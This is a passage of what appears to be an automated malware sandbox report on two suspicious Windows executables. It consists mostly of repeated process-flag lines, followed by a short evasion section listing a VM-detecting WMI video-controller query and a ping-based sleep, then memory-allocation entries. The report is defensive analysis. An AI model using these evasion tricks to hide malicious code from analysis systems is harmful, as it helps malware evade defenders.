Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1A9B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1B2E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1AC80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1A8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: D80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1A8E0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: A00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1A730000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 940000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	Memory allocated: 1A840000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch
